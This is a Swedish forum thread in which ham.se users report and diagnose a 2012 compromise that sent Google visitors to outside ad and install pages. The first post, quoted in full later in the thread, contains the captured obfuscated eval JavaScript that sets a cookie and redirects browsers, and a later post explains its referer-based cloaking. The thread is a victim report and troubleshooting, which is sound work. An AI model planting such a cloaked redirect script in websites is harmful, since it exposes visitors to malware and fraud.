Ham.se utsatt för hackerattack - Ham.se

SA6BJE · 2012-02-22, 16:05

Det verkar som skadlig kod tagit sig in på ham.se
Söker jag på artiklar på google och klickar på en länk som pekar på ham.se så kommer jag till http //tinyurl4.info/43e20abf

Detta verkar endast ske via google i samband med firefox. Testat både på jobbet och hemma med samma resultat. Jag får inte problemet med Internet Explorer.

Söker man på tinyurl4.info får man upp andra som haft liknande problem med smittade forum. Det verkar som "viruset" visar sig eller ej beroende bland annat på referer.

Stänger man av javascript i firefox kommer man istället till en vit sida. Tittar man på källkoden så ser man samma script som finns nedan.

Kanske något för Admin att undersöka närmare.

Bifogar en nätverksdump på request och svar.

Kod:

GET / HTTP/1.1

Host: www.ham.se

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: sv-se,sv;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

DNT: 1

Connection: keep-alive

Referer: http://www.google.se/url?sa=t&rct=j&...5huxtGvCM8I8XQ



HTTP/1.1 200 OK

Date: Wed, 22 Feb 2012 13:45:33 GMT

Server: Apache/2.2.17 (Unix) PHP/5.2.15 mod_ssl/2.2.17 OpenSSL/0.9.7l DAV/2 mod_scgi_pubsub/1.11-pubsub

X-Powered-By: PHP/5.2.15

Set-Cookie: bbsessionhash=082a039b4d99a966595dec4a70ece131; path=/; domain=.ham.se; HttpOnly

Set-Cookie: bblastvisit=1329918333; expires=Thu, 21-Feb-2013 13:45:33 GMT; path=/; domain=.ham.se

Set-Cookie: bblastactivity=0; expires=Thu, 21-Feb-2013 13:45:33 GMT; path=/; domain=.ham.se

Expires: 0

Cache-Control: private, post-check=0, pre-check=0, max-age=0

Pragma: no-cache

X-UA-Compatible: IE=7

MS-Author-Via: DAV

Content-Length: 1099

Keep-Alive: timeout=15, max=500

Connection: Keep-Alive

Content-Type: text/html; charset=ISO-8859-1





var ipbs='43e20abf';eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('m a=["\\A\\d\\b\\l\\c\\z\\d","\\j\\d\\b\\l\\c\\z\\d","\\w\\q\\d\\C\\g\\c\\n\\d\\j\\k","\\b\\e\\D\\B\\l\\J\\b\\n\\c\\i\\A","\\o\\e\\e\\G\\c\\d","\\k","\\w\\q\\g\\v\\b\\u\\k\\f","\\c\\g\\H\\j","\\E","\\r\\e\\o\\v\\b\\c\\e\\i","\\u\\b\\b\\g\\I\\f\\f\\b\\c\\i\\K\\R\\n\\r\\S\\T\\c\\i\\P\\e\\f"];M x(p,y){m h=N O();h[a[1]](h[a[0]]()+L);m s=a[2]+h[a[3]]();t[a[4]]=p+a[5]+y+s+a[6]};x(a[7],a[8]);t[a[9]]=a[F]+Q;',56,56,'||||||||||_0x19e6|x74|x69|x65|x6F|x2F|x70|_0x46a7x4|x6E|x73|x3D|x54|var|x72|x63|_0x46a7x2|x20|x6C|_0x46a7x5|document|x68|x61|x3B|ipbcc|_0x46a7x3|x6D|x67|x4D|x78|x47|x31|10|x6B|x62|x3A|x53|x79|86400000|function|new|Date|x66|ipbs|x75|x34|x2E'.split('|'),0,{}))

QRP · 2012-02-23, 14:54

Citat:

Ursprungligen skriven av SA6BJE

Det verkar som skadlig kod tagit sig in på ham.se
Söker jag på artiklar på google och klickar på en länk som pekar på ham.se så kommer jag till http //tinyurl4.info/43e20abf

Detta verkar endast ske via google i samband med firefox. Testat både på jobbet och hemma med samma resultat. Jag får inte problemet med Internet Explorer.

Söker man på tinyurl4.info får man upp andra som haft liknande problem med smittade forum. Det verkar som "viruset" visar sig eller ej beroende bland annat på referer.

Stänger man av javascript i firefox kommer man istället till en vit sida. Tittar man på källkoden så ser man samma script som finns nedan.

Kanske något för Admin att undersöka närmare.

Bifogar en nätverksdump på request och svar.

Kod:

GET / HTTP/1.1

Host: www.ham.se

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: sv-se,sv;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

DNT: 1

Connection: keep-alive

Referer: http://www.google.se/url?sa=t&rct=j&...5huxtGvCM8I8XQ



HTTP/1.1 200 OK

Date: Wed, 22 Feb 2012 13:45:33 GMT

Server: Apache/2.2.17 (Unix) PHP/5.2.15 mod_ssl/2.2.17 OpenSSL/0.9.7l DAV/2 mod_scgi_pubsub/1.11-pubsub

X-Powered-By: PHP/5.2.15

Set-Cookie: bbsessionhash=082a039b4d99a966595dec4a70ece131; path=/; domain=.ham.se; HttpOnly

Set-Cookie: bblastvisit=1329918333; expires=Thu, 21-Feb-2013 13:45:33 GMT; path=/; domain=.ham.se

Set-Cookie: bblastactivity=0; expires=Thu, 21-Feb-2013 13:45:33 GMT; path=/; domain=.ham.se

Expires: 0

Cache-Control: private, post-check=0, pre-check=0, max-age=0

Pragma: no-cache

X-UA-Compatible: IE=7

MS-Author-Via: DAV

Content-Length: 1099

Keep-Alive: timeout=15, max=500

Connection: Keep-Alive

Content-Type: text/html; charset=ISO-8859-1





var ipbs='43e20abf';eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('m a=["\\A\\d\\b\\l\\c\\z\\d","\\j\\d\\b\\l\\c\\z\\d","\\w\\q\\d\\C\\g\\c\\n\\d\\j\\k","\\b\\e\\D\\B\\l\\J\\b\\n\\c\\i\\A","\\o\\e\\e\\G\\c\\d","\\k","\\w\\q\\g\\v\\b\\u\\k\\f","\\c\\g\\H\\j","\\E","\\r\\e\\o\\v\\b\\c\\e\\i","\\u\\b\\b\\g\\I\\f\\f\\b\\c\\i\\K\\R\\n\\r\\S\\T\\c\\i\\P\\e\\f"];M x(p,y){m h=N O();h[a[1]](h[a[0]]()+L);m s=a[2]+h[a[3]]();t[a[4]]=p+a[5]+y+s+a[6]};x(a[7],a[8]);t[a[9]]=a[F]+Q;',56,56,'||||||||||_0x19e6|x74|x69|x65|x6F|x2F|x70|_0x46a7x4|x6E|x73|x3D|x54|var|x72|x63|_0x46a7x2|x20|x6C|_0x46a7x5|document|x68|x61|x3B|ipbcc|_0x46a7x3|x6D|x67|x4D|x78|x47|x31|10|x6B|x62|x3A|x53|x79|86400000|function|new|Date|x66|ipbs|x75|x34|x2E'.split('|'),0,{}))

Kort efter att ha tittat på nämnda sida (länk) råkade jag ut för denna oförklarliga uppdatering:

=================================
Entry Name : InstallShield Uninstall Information
Installation Date : 2012-02-20 21:22:19
Product Name :
Version :
Company :
Description :
Obsolete : No
Uninstall : No
Installation Folder :
Install Source :
Web Site :
Uninstall String :
Installation Change String:
Quiet Uninstall : No
Registry Key : InstallShield Uninstall Information
Installer : Unknown
Root Key : HKEY_LOCAL_MACHINE
System Component : No
=================================

Någon som drabbats av liknande fenomen?
Vad är det för något? Farligt eller ofarligt?

SA5BKE · 2012-02-23, 15:15

Ja, nåt fuffens är det. Jag har vid två tillfällen nu hamnat på någon annan sida och fått frågor om att installera saker. Jag har klickat bort dessa...

Eric

QRP · 2012-02-23, 15:34

Citat:

Ursprungligen skriven av esn

Ja, nåt fuffens är det. Jag har vid två tillfällen nu hamnat på någon annan sida och fått frågor om att installera saker. Jag har klickat bort dessa...

Eric

Denna (min) installation gjordes i bakgrunden utan någon möjlighet att påverka förloppet. Skulle gärna vilja veta vad det är för något som har installerats!!
Är det "administratörens" skyldighet att hålla forumen rena på virus och maskar eller faller ansvaret på den enskilda forumläsaren att kolla upp detta?
Jag uppfattar Ham.se som ett seriöst forum och förutsätter då att det är ofarligt och rent från skadlig programkod!
//QRP

SM7SEK · 2012-02-23, 16:56

Inte en aning och jag har inte märkt något själv. Jag mailar ägaren så får han ta en titt.

Martin Björnström · 2012-02-29, 15:11

Citat:

Ursprungligen skriven av SA6BJE

Det verkar som skadlig kod tagit sig in på ham.se
Söker jag på artiklar på google och klickar på en länk som pekar på ham.se så kommer jag till http //tinyurl4.info/43e20abf

Detta verkar endast ske via google i samband med firefox. Testat både på jobbet och hemma med samma resultat. Jag får inte problemet med Internet Explorer.

Söker man på tinyurl4.info får man upp andra som haft liknande problem med smittade forum. Det verkar som "viruset" visar sig eller ej beroende bland annat på referer.

Stänger man av javascript i firefox kommer man istället till en vit sida. Tittar man på källkoden så ser man samma script som finns nedan.

Kanske något för Admin att undersöka närmare.

Hej!

Jag förstår inte riktigt hur du menar. Menar du att scriptet/"viruset" finns på själva ham.se eller på tinyurl4.info? Den sistnämnda sajten vet jag ingenting om.

Kan du tydligt förklara steg-för-steg hur du gör för att nå viruset? Google analyserar vår sajt dagligen (genom Webmaster Tools) och har inte rapporterat något som detta.

SA6BJE · 2012-03-01, 12:18

Jag menar att scriptet finns på ham.se

Starta firefox eller annan browser.
Stäng av javascript.
Gå till google.se
Sök på site:ham.se
Klicka på första länken som går till www.ham.se
Endast en vit sida visas.
Högerklicka och välj view source och javascriptet syns.

Går du direkt till www.ham.se i din browser så kommer inte scriptet upp.

Min gissning är att viruset känner av referer och browser info och väljer när javascriptet skall aktiveras och när man skall se den riktiga sidan.
Att det är svårupptäckt gör ju att risken för upptäckt är mycket mindre vilket i sin tur gör att det får finnas kvar längre.

Kolla när filerna index.php eller motsvarande är senast ändrade.
.htaccess eller liknande kanske också kan vara påverkade.
Det verkar som även t.ex. calendar.php är ändrad om den inte är "virtuell"

Det pekar altså på att viruset kommit in via en bugg i vBulletin.

Däremot verkar t.ex. Vlkommen till SSA:s VHF testresultat inte vara smittad eftersom den är utanför vBulletin.

Fråga mer så hjälper jag gärna till.

//Erik

QRP · 2012-03-01, 14:46

Vad är det för virus och hur kan jag nu bli av med det?

//QRP

SA6BJE · 2012-03-01, 16:27

Denna länken kanske kan hjälpa.
FAQ's on the Rogue Plugins Exploit (1/23 vBSEO Patch Release) - vBulletin SEO Forums

Martin Björnström · 2012-03-05, 10:19

Vi har nu uppdaterat alla komponenter och rensat cache & datastore. Jag hoppas verkligen att vi fått bort alla problem. Har inte kunnat återskapa problemet.

SA5BKE · 2012-04-25, 10:37

Något är fortfarande skumt. Nu minns jag inte exakt hur det var förra gången, men om jag söker på Google och hittar en träff som leder till ham.se så hamnar jag istället på en skum sida som vill installera saker. Jag tror det var precis så här förra gången också. Tur att jag kör Linux..

Eric

SA7BXU · 2012-04-25, 12:45

Något liknande har hänt mig ett par gånger de senaste dagarna. Klickade i google på en länk som ledde till ham.se. Kom till en reklamsida. Backade tillbaks till google och tryckte på samma länk igen och kom rätt.
/torbjörn

SM4WWO · 2012-04-25, 12:58

Citat:

Ursprungligen skriven av SA7BXU

Något liknande har hänt mig ett par gånger de senaste dagarna. Klickade i google på en länk som ledde till ham.se. Kom till en reklamsida. Backade tillbaks till google och tryckte på samma länk igen och kom rätt.
/torbjörn

Har också råkat ut för samma sak. Men det var typ en månad sedan.

Men å andra sidan har jag sedan dess alltid gått in direkt på www.ham.se

SM7PXS · 2012-04-25, 18:17

Hej alla

Jag gjorde en test helt ovetenskapligt. Gick till google nyss och sökte på ham.se. Första länken som kommer upp visas mycket riktigt som ham.se. när man klickar kommer det en hel del popups och andra sidor men inte ham.se. tom svåra att stänga ner genom alt-F4.

Men när jag sedan försökte återskapa felet genom att igen gå till google, söka på ham.se och sedan klicka på samma länk så kommer jag rätt varje gång. Har försökt flera gånger nu. Så felet dyker inte alltid upp. Bara ibland.

Otrevligt är det i vilket fall som helst.

Körde i detta fallet IE9

SM7PXS
Örjan

SM0YDO · 2012-04-25, 18:23

Hej jag har också samma problem när jag ska logga in på Ham.se då provade jag med
att logga in på hembyggen direkt via google men då är det samma problem igen.

Hårddisken i min gamla dator jobbar hela tiden när windows är igång så jag misstänker
att det är virus i den.

mvh Lasse sm0ydo

SM7SEK · 2012-04-25, 19:34

Det skumma är ju att man bara blir omdirigerad när man kommer från google. Går jag direkt in på ham.se har det aldrig skett någon omdirigering. Detta oavsett om jag klickar på länken i de mail som kommer om att tråden uppdaterats eller skriver in adressen manuellt alternativt via bokmärke.

Är det någon som blivit omdirigerad när man gått direkt mot adressen www.ham.se?

sm5phu · 2012-04-26, 08:14

Jag kunde se detta med Firefox 11, men efter att jag uppgraderade till Firefox 12 kan jag inte återskapa problemet.

Med Safari 5.1.5 kan jag återskapa problemet.

Kan det ha något att göra med de säkerhetbrister som åtgärdades mellan Firefox 11 och 12?
https://www.mozilla.org/security/kno...s/firefox.html

Direkt mot ham.se har jag aldrig blivit omdirigerad.

Edit: Problemet uppträder hos mig med Firefox 12 under Vista men inte under MacOS.

73,
Jonas/SM5PHU

SM4WWO · 2012-04-26, 10:20

Jag kör senaste versionen av Chrome.

SA5BKE · 2012-04-26, 10:40

Nu har jag sniffat en session och kan konstatera att det är ham.se som är infekterat. Samma problem som förra gången.

SA5BKE · 2012-04-26, 10:46

Jag hittade denna text:

How to remove Google / Yahoo redirection virus or malware from your website

Det verkar vara samma. Att ni inte ser problemet varje gång beror på att viruset satt en cookie i er webläsare så därför händer bara vidareskickningen ibland.

Eric

sa7axi · 2012-04-26, 11:55

i Firefox :inställningar / Sekretess / Ta bort enskilda kakor / och ta bort alla kakor ifrån Ham.se
Brukar fungera efter det.
Alternativ ta bort alla kakor.

Blev lite nyfiken om vad en del rapporterade här? Startade WMware och WIN7 som är installerat där, och med Firefox inga problem men med Internet explorer och Ham.se så upptäcker jag ganska snabbt att "infinityads.com" finns på sidan, och detta är ett företag som ser till att man mer eller mindre blir tvungen att klicka på popupsidan som dyker upp.
Den som har det kontot får sedan betalt efter hur många som klickat där.

Men F-Secure startade aldrig igång och jag kan inte upptäcka något annat.
I Linux och Firefox märker jag ingenting tror ADblock plus tar det?

SM4RNA · 2012-04-26, 14:56

Nu försöktes det köras ett script när jag kollade över de nya inläggen trots att jag gått till denna sida direkt och inte via Google. Tror den hette crome.js. Klickade tyvärr bort den lite fort..

JanneG · 2012-04-27, 12:16

Detta handlar troligen om DNSChanger, se https://www.cert.se/publikationer/na...e-over-8e-mars

Aftonbladet skriver idag om ett "estniskt virus" (eg. en trojan?) och det är förmodligen samma elaking som då och då plågar Google-användare när de söker ham.se.
73/Janne SM0AQW

SA5BKE · 2012-04-27, 12:24

Citat:

Ursprungligen skriven av JanneG

Detta handlar troligen om DNSChanger, se https://www.cert.se/publikationer/na...e-over-8e-mars

Vad är det som får dig att tro det? Inget som jag sett hittils tyder på att DNS skulle vara utsatt i min klient. Möjligt att det är den som den sedan vill installera, men så långt kommer den inte hos mig. Grundproblemet är att det finns skadlig kod på ham.se som i vissa fall skickar användaren vidare till andra ställen.

Eric

SA0BUX · 2012-04-27, 22:54

Citat:

Ursprungligen skriven av SM7SEK

Det skumma är ju att man bara blir omdirigerad när man kommer från google. Går jag direkt in på ham.se har det aldrig skett någon omdirigering. Detta oavsett om jag klickar på länken i de mail som kommer om att tråden uppdaterats eller skriver in adressen manuellt alternativt via bokmärke.

Är det någon som blivit omdirigerad när man gått direkt mot adressen www.ham.se?

Här finns det information om vad det handlar om:

https://www.vbulletin.com/forum/arch...t-381140.html?

Särskilt: Admin Zone Forums - View Single Post - vBulletin Redirect Exploit

2012-02-23, 16:56	#5
SM7SEK Seniormoderator Blev medlem: Aug 2003 Från: Smedby utanför Kalmar Ålder: 49 Inlägg: 431	Inte en aning och jag har inte märkt något själv. Jag mailar ägaren så får han ta en titt. __________________ 73 Ulf Följ Kalmar radioamatörsällskaps (KRAS) kurser i klassisk radioteknik på vår hemsida Kalmar Radioamatörsällskap

2012-03-05, 10:19	#10
Martin Björnström Sheriff Blev medlem: Jul 2003 Från: Stockholm Ålder: 39 Inlägg: 83	Vi har nu uppdaterat alla komponenter och rensat cache & datastore. Jag hoppas verkligen att vi fått bort alla problem. Har inte kunnat återskapa problemet. SM7SEK, SM0RVV and SA6BJE like this.

2012-04-25, 18:17	#14
SM7PXS Blev medlem: Nov 2003 Från: Nybro Ålder: 47 Inlägg: 43	Hej alla Jag gjorde en test helt ovetenskapligt. Gick till google nyss och sökte på ham.se. Första länken som kommer upp visas mycket riktigt som ham.se. när man klickar kommer det en hel del popups och andra sidor men inte ham.se. tom svåra att stänga ner genom alt-F4. Men när jag sedan försökte återskapa felet genom att igen gå till google, söka på ham.se och sedan klicka på samma länk så kommer jag rätt varje gång. Har försökt flera gånger nu. Så felet dyker inte alltid upp. Bara ibland. Otrevligt är det i vilket fall som helst. Körde i detta fallet IE9 SM7PXS Örjan Senast ändrad av SM7PXS den 2012-04-25 klockan 18:19 Orsak: glömt info

2012-04-25, 19:34	#16
SM7SEK Seniormoderator Blev medlem: Aug 2003 Från: Smedby utanför Kalmar Ålder: 49 Inlägg: 431	Det skumma är ju att man bara blir omdirigerad när man kommer från google. Går jag direkt in på ham.se har det aldrig skett någon omdirigering. Detta oavsett om jag klickar på länken i de mail som kommer om att tråden uppdaterats eller skriver in adressen manuellt alternativt via bokmärke. Är det någon som blivit omdirigerad när man gått direkt mot adressen www.ham.se? __________________ 73 Ulf Följ Kalmar radioamatörsällskaps (KRAS) kurser i klassisk radioteknik på vår hemsida Kalmar Radioamatörsällskap Senast ändrad av SM7SEK den 2012-04-26 klockan 07:03 Orsak: förtydligade vad jag menade

2012-04-26, 08:14	#17
sm5phu Blev medlem: Jul 2004 Från: Bromma Inlägg: 302	Jag kunde se detta med Firefox 11, men efter att jag uppgraderade till Firefox 12 kan jag inte återskapa problemet. Med Safari 5.1.5 kan jag återskapa problemet. Kan det ha något att göra med de säkerhetbrister som åtgärdades mellan Firefox 11 och 12? https://www.mozilla.org/security/kno...s/firefox.html Direkt mot ham.se har jag aldrig blivit omdirigerad. Edit: Problemet uppträder hos mig med Firefox 12 under Vista men inte under MacOS. 73, Jonas/SM5PHU Senast ändrad av sm5phu den 2012-04-26 klockan 10:22

2012-02-23, 15:15	#3
SA5BKE Blev medlem: Jul 2009 Från: Norrköping Ålder: 32 Inlägg: 225	Ja, nåt fuffens är det. Jag har vid två tillfällen nu hamnat på någon annan sida och fått frågor om att installera saker. Jag har klickat bort dessa... Eric

2012-03-01, 12:18	#7
SA6BJE Blev medlem: Nov 2009 Inlägg: 24	Jag menar att scriptet finns på ham.se Starta firefox eller annan browser. Stäng av javascript. Gå till google.se Sök på site:ham.se Klicka på första länken som går till www.ham.se Endast en vit sida visas. Högerklicka och välj view source och javascriptet syns. Går du direkt till www.ham.se i din browser så kommer inte scriptet upp. Min gissning är att viruset känner av referer och browser info och väljer när javascriptet skall aktiveras och när man skall se den riktiga sidan. Att det är svårupptäckt gör ju att risken för upptäckt är mycket mindre vilket i sin tur gör att det får finnas kvar längre. Kolla när filerna index.php eller motsvarande är senast ändrade. .htaccess eller liknande kanske också kan vara påverkade. Det verkar som även t.ex. calendar.php är ändrad om den inte är "virtuell" Det pekar altså på att viruset kommit in via en bugg i vBulletin. Däremot verkar t.ex. Vlkommen till SSA:s VHF testresultat inte vara smittad eftersom den är utanför vBulletin. Fråga mer så hjälper jag gärna till. //Erik

2012-03-01, 14:46	#8
QRP Blev medlem: Jan 2005 Inlägg: 321	Vad är det för virus och hur kan jag nu bli av med det? //QRP

2012-03-01, 16:27	#9
SA6BJE Blev medlem: Nov 2009 Inlägg: 24	Denna länken kanske kan hjälpa. FAQ's on the Rogue Plugins Exploit (1/23 vBSEO Patch Release) - vBulletin SEO Forums

2012-04-25, 10:37	#11
SA5BKE Blev medlem: Jul 2009 Från: Norrköping Ålder: 32 Inlägg: 225	Något är fortfarande skumt. Nu minns jag inte exakt hur det var förra gången, men om jag söker på Google och hittar en träff som leder till ham.se så hamnar jag istället på en skum sida som vill installera saker. Jag tror det var precis så här förra gången också. Tur att jag kör Linux.. Eric

2012-04-25, 12:45	#12
SA7BXU Blev medlem: Mar 2012 Från: Lund Inlägg: 2	Något liknande har hänt mig ett par gånger de senaste dagarna. Klickade i google på en länk som ledde till ham.se. Kom till en reklamsida. Backade tillbaks till google och tryckte på samma länk igen och kom rätt. /torbjörn

2012-04-25, 18:23	#15
SM0YDO Blev medlem: Apr 2006 Inlägg: 632	Hej jag har också samma problem när jag ska logga in på Ham.se då provade jag med att logga in på hembyggen direkt via google men då är det samma problem igen. Hårddisken i min gamla dator jobbar hela tiden när windows är igång så jag misstänker att det är virus i den. mvh Lasse sm0ydo

2012-04-26, 10:20	#18
SM4WWO Blev medlem: Nov 2003 Från: Leksand Inlägg: 33	Jag kör senaste versionen av Chrome.

2012-04-26, 10:40	#19
SA5BKE Blev medlem: Jul 2009 Från: Norrköping Ålder: 32 Inlägg: 225	ham.se infekterat Nu har jag sniffat en session och kan konstatera att det är ham.se som är infekterat. Samma problem som förra gången.

2012-04-26, 10:46	#20
SA5BKE Blev medlem: Jul 2009 Från: Norrköping Ålder: 32 Inlägg: 225	Jag hittade denna text: How to remove Google / Yahoo redirection virus or malware from your website Det verkar vara samma. Att ni inte ser problemet varje gång beror på att viruset satt en cookie i er webläsare så därför händer bara vidareskickningen ibland. Eric sm5phu likes this.

2012-04-26, 11:55	#21
sa7axi Blev medlem: Dec 2009 Inlägg: 65	i Firefox :inställningar / Sekretess / Ta bort enskilda kakor / och ta bort alla kakor ifrån Ham.se Brukar fungera efter det. Alternativ ta bort alla kakor. Blev lite nyfiken om vad en del rapporterade här? Startade WMware och WIN7 som är installerat där, och med Firefox inga problem men med Internet explorer och Ham.se så upptäcker jag ganska snabbt att "infinityads.com" finns på sidan, och detta är ett företag som ser till att man mer eller mindre blir tvungen att klicka på popupsidan som dyker upp. Den som har det kontot får sedan betalt efter hur många som klickat där. Men F-Secure startade aldrig igång och jag kan inte upptäcka något annat. I Linux och Firefox märker jag ingenting tror ADblock plus tar det? Senast ändrad av sa7axi den 2012-04-26 klockan 15:50

2012-04-26, 14:56	#22
SM4RNA Blev medlem: Jul 2008 Från: Anders i Ludvika Inlägg: 911	Nu försöktes det köras ett script när jag kollade över de nya inläggen trots att jag gått till denna sida direkt och inte via Google. Tror den hette crome.js. Klickade tyvärr bort den lite fort.. __________________ Känner du glöden, eller ser du den bara?

2012-04-27, 12:16	#23
JanneG Blev medlem: Nov 2004 Inlägg: 199	Detta handlar troligen om DNSChanger, se https://www.cert.se/publikationer/na...e-over-8e-mars Aftonbladet skriver idag om ett "estniskt virus" (eg. en trojan?) och det är förmodligen samma elaking som då och då plågar Google-användare när de söker ham.se. 73/Janne SM0AQW

Tråd
Visa utskriftsvänlig version Skicka denna sida som e-post